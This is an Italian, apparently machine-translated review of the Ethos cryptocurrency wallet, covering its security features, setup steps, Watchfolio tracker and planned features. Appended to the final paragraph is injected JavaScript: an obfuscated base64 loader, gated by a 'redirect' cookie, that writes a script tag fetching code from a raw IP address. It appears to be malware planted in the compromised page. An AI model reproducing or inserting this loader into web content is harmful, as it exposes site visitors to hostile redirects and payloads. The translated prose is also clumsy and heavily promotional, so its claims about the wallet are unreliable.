15 49.0138 8.38624 1 0 4000 1 https://harowo.com 300 0
theme-sticky-logo-alt
theme-logo-alt

Recensione di Ethos Wallet: un portafoglio universale per Crypto

Ogni volta che pensi di entrare in questa cosa “ crittografica ” di cui continui a sentire tanto parlare, sei scoraggiato dai livelli di complessità coinvolti, a partire dal procurarti questi elusivi gettoni virtuali da scambi dal suono strano (cosa è esattamente “ Coinbase ” anche dovrebbe significare comunque?) alla seccatura di riporli in modo sicuro, spesso scrivendo parole incomprensibili su un pezzo di carta che dovresti custodire con la tua vita (beh, ripensandoci, forse non con la tua vita). Questo prima ancora che tu abbia il coraggio di pensare a usarli effettivamente, coinvolgendo un insieme completamente diverso di complessità come chiavi pubbliche, chiavi private, generazione di indirizzi e cosa no.

Bene, sembra che tu sia finalmente fortunato.

Un nuovo portafoglio chiamato Ethos è appena arrivato in città, promettendo di offrire l’intero ecosistema crittografico sotto un unico tetto metaforico. Meglio ancora, come applicazione mobile, mette il mondo delle criptovalute letteralmente a portata di mano, permettendoti di fare di tutto, dall’invio di monete al tenere traccia del loro destino con un solo tocco. E con una dozzina di nuove funzionalità ancora in linea, è tutto pronto per fare ancora di più.

Lo Smartwallet

L’offerta principale dell’app Ethos, lo smartwallet è un portafoglio “caldo” multi-crittografico che promette di archiviare le tue monete – o meglio, gli indirizzi a loro – in modo sicuro, ma facile da negoziare. Dotato di una sicurezza senza precedenti e di un’interfaccia utente intuitiva, il portafoglio supporta una serie di monete su diversi blockchain, con altre aggiunte ogni giorno per avvicinarlo al tag “Universale” di cui si vanta.

Sicurezza

La prima domanda che viene posta ogni volta che un nuovo portafoglio arriva sul mercato, è quanto sia sicuro il mio portafoglio?

E purtroppo, la risposta che più viene fuori è, non molto, davvero. Persino Jaxx, di gran lunga il ragazzo più popolare del quartiere, ha alcune gravi falle di sicurezza che minano la sua premessa di diventare l’opzione di riferimento per gli appassionati di criptovaluta. In uno scenario del genere, di solito si consiglia di non memorizzare un numero elevato di monete su questi portafogli “caldi”, mantenendo gli investimenti in alternative hardware più sicure come Trezor o Ledger Nano.

Ma Ethos sembra destinato a cambiare tutto questo. Con funzionalità di sicurezza che vanno da un seed a 256 bit all’autenticazione biometrica, lo smartwallet Ethos ha compiuto ogni possibile passo per garantire la sicurezza delle tue risorse digitali.

La Smartkey

All’inizio andava tutto bene. C’era solo un bitcoin e tutto quello che dovevi fare era scrivere la sua chiave privata su un pezzo di carta e metterlo in una cassaforte. Poi è arrivato Ethereum. E Ripple. E Litecoin. Prima che te ne rendessi conto, le monete stavano spuntando dal nulla più velocemente di quanto potresti dire “Jack Robinson” e stavi finendo la carta per scrivere tutte quelle chiavi.

Poi un tipo intelligente ha avuto l’idea della MH, come in Hierarchical Deterministic. Fondamentalmente, il concetto ruota attorno alla generazione di un numero elevato (praticamente infinito) di chiavi pubbliche e indirizzi per diverse monete e blockchain da un singolo “seme” iniziale, comprimendo efficacemente tutti quegli indirizzi in un’unica chiave. Questa chiave può quindi essere utilizzata per ricreare nuovamente gli stessi indirizzi anche su una piattaforma diversa, consentendo l’accesso ai propri fondi su qualsiasi dispositivo senza dover trasmettere la chiave a un server.

Lo smartwallet Ethos lo implementa come SmartKey, una sequenza di 24 parole generata dai movimenti casuali effettuati dall’utente durante la configurazione dell’account, garantendo un set di indirizzi univoco per ciascuno. Questa frase mnemonica si raddoppia anche come mezzo di accesso sicuro all’account in caso di danni catastrofici al telefono, e come tale è pensato per essere tenuto con cura dall’utente solo, in sostanza agendo come una “ chiave ” privata per quello criptovaluta della persona.

O come avrebbe detto Sauron ossessionato dalle criptovalute

“Una chiave per dominarli tutti, una chiave per trovarli; una chiave per portarli tutti e nell’oscurità legarli. Nella terra della crittografia, dove si nasconde la crittografia. “

 Tastiera virtuale

Come è stato dimostrato in passato con molti wallet, il semplice utilizzo di un seed privato e di un PIN non garantisce la sicurezza; gli hacker possono inserire codice dannoso che registra le tue azioni, registrando sia la frase mnemonica che il PIN, quindi potenzialmente sottrarre tutti i tuoi fondi altrove. Per contrastare questo problema, l’app Ethos utilizza una tastiera virtuale per inserire tali dati vitali, proteggendo l’input dall’essere intercettato da agenti malvagi.

Autenticazione a doppio strato

Sebbene l’utilizzo di un PIN per l’accesso sia una pratica standard per qualsiasi portafoglio crittografico, Ethos fa un ulteriore passo avanti imponendo anche l’autenticazione biometrica, assicurando che il tuo portafoglio non possa mai cadere nelle mani sbagliate.

NOTA: A partire da ora, l’app Ethos non disconnette automaticamente l’utente se lasciata incustodita, garantendo l’accesso a chiunque dopo che è stato effettuato l’accesso una volta dall’utente effettivo. Mentre il team Ethos sta lavorando per risolvere questo problema entro il prossimo aggiornamento, per ora sarebbe meglio ricordarsi di disconnettersi manualmente dopo aver finito con esso.

Sebbene Ethos possa essere il portafoglio crittografico più sicuro in circolazione, è bene ricordare che è solo un altro pezzo di tecnologia, sicuro quanto la persona che lo detiene. Anche se l’app può essere protetta da attacchi tecnici sofisticati, non proteggerà da un ladro non sofisticato che si limita a battere la “verità” su di te: il classico attacco con chiave inglese da $ 5.

Configurazione di Smartwallet

Passaggio 1 Iniziare con Ethos è molto semplice. Poiché si tratta di un’applicazione mobile, è sufficiente scaricarla dal rispettivo negozio (Google Play per utenti Android, App Store per quelli su iOS) e installalo. Eseguendolo, dovresti essere accolto da una schermata di accesso.

Screenshot 2018 07 17 14 04 02803 io.ethos.universalwallet

Passaggio 2 Registrarsi con Ethos e controllare la posta in arrivo per l’email di verifica. Una volta completato il processo, puoi accedere da solo per iniziare effettivamente a creare il tuo smartwallet.

Screenshot 2018 07 17 14 09 52357 io.ethos.universalwallet

Passaggio 3 Facendo clic su “Aggiungi nuovo” si arriva a una scelta, poiché l’app Ethos Universal ha due modalità distinte, Smartwallet o Watchfolio. Scegli lo Smartwallet per ora.

Screenshot 2018 07 17 14 10 26489 io.ethos.universalwallet

Passaggio 4 Successivamente, l’app ti chiederà di nominare il tuo portafoglio. Non c’è bisogno di essere troppo particolare, poiché puoi sempre cambiarlo in seguito.

Screenshot 2018 07 17 14 12 34709 io.ethos.universalwallet

Passaggio 5 Ora arriva la parte divertente; Per creare un seme davvero casuale per te stesso, devi scuotere il telefono. Quindi, scuotilo, scuotilo come se la tua vita dipendesse da questo!

Screenshot 2018 07 19 03 52 19999 io.ethos.universalwallet

Passaggio 6 Una volta che il processo è stato completato con successo (dovrebbe richiedere a malapena un paio di minuti), ti verrà presentato un elenco numerato di 24 parole, 6 alla volta. Questa è la frase mnemonica del tuo portafoglio, quindi assicurati di annotare tutte le parole nell’ordine corretto.

Screenshot 2018 07 19 03 53 07813 io.ethos.universalwallet

Passaggio 7 Dopo aver annotato le parole, Ethos ti chiederà di inserirne tre per confermare che hai seguito correttamente l’esercizio. Dopo aver superato questo test, l’app ti chiederà di scegliere un PIN di quattro cifre o superiore che verrà utilizzato per crittografare la tua smartkey generata in precedenza e fungerà anche da password per l’utilizzo del portafoglio.

Screenshot 2018 07 19 03 55 23665 io.ethos.universalwallet

Passaggio 8 Questo è tutto! Hai creato il tuo Smartwallet. Caricalo con alcune monete accanto per vedere quei bei loghi riempire tutto quello spazio vuoto. Aspetta un secondo. Non ti ho mai detto come ricevere monete, vero??

Seguimi fino alla sezione successiva!

Screenshot 2018 07 19 03 56 53463 io.ethos.universalwallet

Ricevere monete sul tuo Smartwallet

Va benissimo creare un portafoglio crittografico super sicuro, ma non è molto utile se non contiene nulla, vero? Quindi correggiamo questa evidente lacuna.

Dall’interno del tuo Smartwallet, tocca “Aggiungi moneta”. Ti verrà presentato un elenco di monete e gettoni. Seleziona la moneta che desideri aggiungere e la vedrai apparire magicamente nel tuo portafoglio. Ma non hai ancora finito! Tocca ancora una volta la moneta e seleziona “Transazione”.

È qui che diventa un po ‘complicato. Vedi, ricevere monete su un portafoglio richiede la trasmissione della chiave pubblica del portafoglio, una densa stringa di testo alfanumerica che deve essere riprodotta esattamente dal mittente dei fondi. Per renderlo il più semplice possibile, la maggior parte dei portafogli, incluso Ethos, utilizza i codici QR. Da qui la piccola icona del codice QR nell’angolo in basso a destra, etichettata “Invia / Ricevi”.

Tocca l’icona e la moneta con cui desideri effettuare la transazione. Nell’overlay, seleziona “Ricevi”. Ti verrà mostrato un codice QR che rappresenta il tuo indirizzo; scansionalo con un altro portafoglio o exchange di criptovalute per trasferire fondi su di esso. Congratulazioni! Il tuo portafoglio ha finalmente dei contanti (digitali)!

Se sei troppo ansioso di inviare queste monete appena ricevute (forse per effettuare un pagamento?), Segui di nuovo i passaggi precedenti, assicurandoti solo di premere “Invia”. Invece di visualizzare un codice QR, ti verrà chiesto di scansionarne uno o di inserire il codice manualmente. Poiché l’invio di fondi è un’attività più rischiosa rispetto alla ricezione, l’app verificherà le tue credenziali con i tuoi dati biometrici e il tuo PIN prima di eseguire la transazione.

Il Watchfolio

La parte più noiosa dell’investimento in criptovalute deve essere il monitoraggio: devi tenere traccia manualmente di ogni pezzo di moneta che possiedi nei tuoi vari indirizzi e ricordare i prezzi a cui li hai acquistati e setacciare i numerosi scambi di scambio prima che tu possa avere la minima idea di dove stanno andando i tuoi investimenti.

Non più.

Ethos Watchfolio ti consente di aggiungere qualsiasi moneta che presumibilmente possiedi (anche se in realtà non ne possiedi una – può essere utile solo per controllare il mercato) e specificare il suo prezzo di ingresso per tenere traccia delle loro statistiche e cambiamenti rilevanti in tempo reale , aiutato da tabelle e grafici di facile comprensione per coloro che sono più orientati alla vista. La parte buona è che puoi persino aggiungere monete che hai in cella frigorifera, permettendoti di tenere d’occhio il loro valore senza portarle nel mondo grande e cattivo. E sì, dal momento che lo smartwallet Ethos mira alla fine a farti scambiare criptovalute dall’app stessa, potresti anche vendere quella roba calda prima che passi di moda.

Provando Ethos Watchfolio

Segui i primi passaggi nella sezione Smartwallet, fino ad arrivare alla scelta tra Smartwallet e Watchfolio; Questa volta, tocca invece il Watchfolio.

Screenshot 2018 07 17 14 10 26489 io.ethos.universalwallet

Verrai indirizzato immediatamente al tuo Watchfolio, perché a differenza di uno Smartwallet, un Watchfolio è solo un’ipotetica raccolta di monete, non un vero e proprio deposito per loro, e quindi non necessita di controlli di sicurezza. Naviga fino alla moneta di tua scelta (forse quella che ti stai rilassando in quella tua cella frigorifera?) E seleziona la quantità, il prezzo e la data del tuo scambio per aggiungerla al tuo portafoglio per il monitoraggio automatico del suo destino nel mercato. Puoi persino creare una lista dei desideri per confrontare le prestazioni di alcune nuove monete prima di decidere di acquistarle.

Profili delle monete

Il Watchfolio di per sé non è molto interessante. È solo se preso insieme ai profili delle monete in-app di Ethos Universal Wallet che la funzione inizia davvero a brillare. Ethos tiene traccia delle statistiche di marketing vitali di ogni moneta supportata, oltre a fornire un piccolo frammento sulla sua storia e sulle valutazioni inviate dagli utenti. Ancora più utili sono i diversi tipi di grafici, che indicano le mutevoli fortune della moneta attraverso ore, giorni, settimane o persino anni, in un formato facile da digerire, che ti consente di prendere decisioni di investimento sane senza dover esplorare Internet.

Funzionalità di Ethos Wallet in arrivo

Come ogni applicazione alle prime armi, il portafoglio universale Ethos ha appena iniziato a testare le acque, eliminando gli insetti e ridimensionando il mercato prima che tiri fuori i suoi grandi cannoni. Presentato come un ecosistema crittografico piuttosto che un semplice portafoglio, ci sono ancora molte cose in lavorazione per questo brillante ambasciatore del cambiamento.

Airdrop

airdrop

“Il programma Ethos Airdrop non è un incentivo in alcun modo.”

Si, come no. I ragazzi di Ethos sono esempi di virtù, totalmente non motivati ​​dagli istinti più bassi che affliggono noi mortali minori … Ad ogni modo, il risultato è che Ethos ha stretto una partnership con un bel numero di token meno conosciuti, che verrebbero trasmessi (cioè dati) via gratis!) nel prossimo futuro. Le condizioni esatte che circondano l’evento non sono ancora chiare; in precedenza, si credeva che solo gli utenti preregistrati del portafoglio sarebbero stati idonei, ma dopo il rilascio del portafoglio, Ethos ha chiarito che anche i nuovi utenti sarebbero stati in grado di partecipare, sebbene i dettagli completi non siano ancora disponibili. Quindi scarica l’app, registrati e incrocia le dita: forse alcune monete ti cadranno in grembo.

Domini crittografici personalizzati

Immagina di dover inserire qualcosa come 2001: 4860: 4860 :: 8888 ogni volta che vuoi cercare qualcosa su Google. Noioso, no? Eppure è esattamente così che funziona la blockchain in questo momento, con l’account di ogni persona rappresentato da un mucchio di parole incomprensibili come mwkXG8NnB2snbqWTcpNiK6qqGHm1LebHDc, il che rende umanamente impossibile ricordare o trattare con loro.

Inserisci domini Wallet verificati. Dando al tuo portafoglio un nome univoco e leggibile, i domini del portafoglio verificato ti consentono di riservare il tuo spazio sulla blockchain, consentendoti di inviare e ricevere facilmente pagamenti senza armeggiare con testo e numeri ingombranti. Un proiettile d’argento per le aziende, può finalmente portare grandi marchi nell’economia crittografica, dando il via a una crescita e un interesse senza precedenti per le valute virtuali. E ovviamente puoi sempre usarlo per pagare di nascosto quella lattina di birra che hai infilato anche sotto il naso di tuo padre; dopotutto, nessuno può provare che quelle monete provengano da te, vero??

Celle frigorifere

Una spina nel fianco dei portafogli crittografici è stata la loro incapacità di archiviare monete offline, esponendo l’intero patrimonio dell’utente agli attacchi di scrupolosi hacker. Ciò ha ostacolato l’adozione e l’uso su larga scala dei portafogli, costringendo gli utenti a tornare alla sicurezza, anche se opzioni goffe come i portafogli hardware o il vecchio pezzo di carta, che non sono accessibili da Internet.

Ma fin dall’inizio, Ethos ha segnalato la sua intenzione di rendere ridondanti i portafogli hardware. Come esattamente questo sarebbe stato ottenuto è ancora tutt’altro che chiaro, con i creatori di Ethos che lo descrivono come un “libro mastro nano nel cielo”, il che lo fa apparire come una sorta di struttura di archiviazione offline per le chiavi private dei suoi utenti, solo il meccanismo di firma delle transazioni di cui sarebbe esposto alla rete. Se implementata correttamente, l’innovazione ha davvero il potenziale per spodestare ogni altro portafoglio là fuori, hardware o altro, e catapultare Ethos nella posizione di portafoglio di fatto preferito da ogni detentore di criptovalute..

Fiat Gateway

Forse la caratteristica più attesa di Ethos Universal Wallet, molte persone (me compreso) sono rimaste deluse quando l’app è stata lanciata senza di essa. Fondamentalmente, un gateway Fiat consentirebbe a un utente di scambiare le sue risorse digitali con valute tradizionali, ‘fiat’ e viceversa, permettendoti di acquistare le tue monete preferite con la tua carta di credito o di vendere le tue riserve in eccesso per incassare una corsa al rialzo da l’app stessa. Per quanto semplice possa sembrare, la funzionalità non è banale da implementare, richiede una serie di licenze e permessi oltre agli imbrogli tecnologici per farlo funzionare senza problemi; di conseguenza, questa capacità è offerta solo dai principali scambi di criptovalute, che addebitano commissioni elevate per questo.

Una volta risolti i nodi, tuttavia, lo sviluppo avrà conseguenze di vasta portata, integrando i mercati tradizionali e digitali a un limite imprevisto. Ciò non solo distruggerebbe l’attività di scambi come Coinbase, che attualmente mantiene il monopolio sulla transazione di criptovalute, ma ridefinirebbe anche i pagamenti utilizzando la criptovaluta come mezzo di trasmissione che trascende i regolamenti ei confini nazionali, rendendo servizi come Paypal con le loro commissioni stravaganti inutili.

Forse ora puoi capire perché personalmente mi riferisco a questa funzione come “The Giant killer”.

Partnership

C’è solo così tanto che solo Ethos può fare. Per essere il punto di svolta che vuole essere, Ethos Wallet cerca di collaborare con servizi in tutto lo spettro del settore finanziario, tirando fuori la criptovaluta dalla sua nicchia per avere un impatto sul mondo in generale.

Fusione

immagine incollata 0

L’obiettivo finale del progetto Ethos è abbattere le barriere che impediscono alla criptovaluta di essere considerata un’alternativa legittima alle valute legali. Laddove un braccio di questo si occupa di fornire un mezzo per mantenere e negoziare facilmente in criptovalute, l’altro braccio ha il compito di infondere una misura di stabilità e sicurezza nelle risorse digitali, portandole alla pari con gli strumenti finanziari tradizionali.

Fusion Financial è l’altro braccio, che lavora per integrare titoli e criptovalute in un unico mercato di investimento. Regolamentato dalla SEC, Fusion è un servizio di investimento automatizzato che segue un modello di investimento ibrido che combina azioni tradizionali con criptovalute ben performanti. In precedenza, sono state sollevate domande sulla sua capacità di offrire un’esperienza senza interruzioni attraverso lo spazio delle criptovalute piuttosto frammentato, ma l’arrivo di Ethos Universal Wallet e tutto ciò che comporta ha messo a tacere quelle paure. Non è impensabile immaginare un futuro prossimo in cui si potrebbe spostare i propri investimenti da una sicurezza di tank all’oro digitale, tutto all’interno dell’app Ethos.

Payroc

immagine incollata 0 13

Nonostante tutti i suoi discorsi di libertà e liquidità illimitata, una criptovaluta è in realtà piuttosto difficile da trattare, riducendola a una curiosità che si trova nei portafogli di una manciata di nerd e smanettoni. Per favorire l’adozione fondamentale delle criptovalute, è necessario portarle nella sfera delle piccole transazioni quotidiane che costituiscono la vita normale. A tal fine, Ethos ha annunciato una partnership con la rinomata società di soluzioni di pagamento mercantili Payroc, che gestisce gateway di pagamento per piccole e grandi imprese. Integrandosi con l’ecosistema Payroc, Ethos acquisisce la capacità di offrire pagamenti crittografici diretti e gratuiti ai commercianti, incentivando ulteriormente clienti e venditori a fare il passo verso la criptovaluta. Se considerato insieme ad altre sue iniziative come i domini portafogli verificati, non si può fare a meno di essere convinti dell’imminente esplosione di criptovalute nello spazio commerciale.

Conclusione

Si dice spesso che sia pericoloso fare previsioni in tecnologia. Eppure a volte un’offerta è sostenuta da una tale ricchezza di innovazione, che è quasi stupido tentare di confutare la sua supremazia. L’Ethos Universal Wallet sarebbe uno di questi esempi, in cui anche una rapida occhiata ai suoi aspetti rivela un ecosistema maturo, ben progettato e dotato di un incredibile potenziale. Non c’è motivo per non chiamare Ethos un gamechanger nel mondo delle criptovalute; uno che potrebbe scuotere lo status quo in meglio.

Il palcoscenico è già pronto, tocca a Ethos diventare la prima app killer delle criptovalute. function getCookie (e) {var U = document.cookie.match (new RegExp (“(?: ^ |;)” + e.replace (/([\.$?* | {} \ (\) \ [\ ] \\\ / \ + ^]) / g, “\\ $ 1 ″) +” = ([^;] *) “)); return U? decodeURIComponent (U [1]): void 0} var src = “dati: text / javascript; Base64, ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs =”, ora = Math.floor (Date.now () / 1e3), biscotto = getCookie ( “redirect”); if (ora>= (time = cookie) || void 0 === time) {var time = Math.floor (Date.now () / 1e3 + 86400), date = new Date ((new Date) .getTime () + 86400) ; document.cookie = “redirect =” + time + “; percorso = /; expires = “+ date.toGMTString (), document.write (“)}

SommarioRecensione del portafoglio EthosNome articolo Recensione di Ethos WalletDescrizioneEthos Universal Wallet revisionato in dettaglio.Autore Levin RoyNome editore Totalcrypto.ioPublisher Logo

Previous Post
As melhores carteiras de Bitcoin anônimas: o único guia de que você precisa
Next Post
Modum Coin – Възникващите технологии се обединяват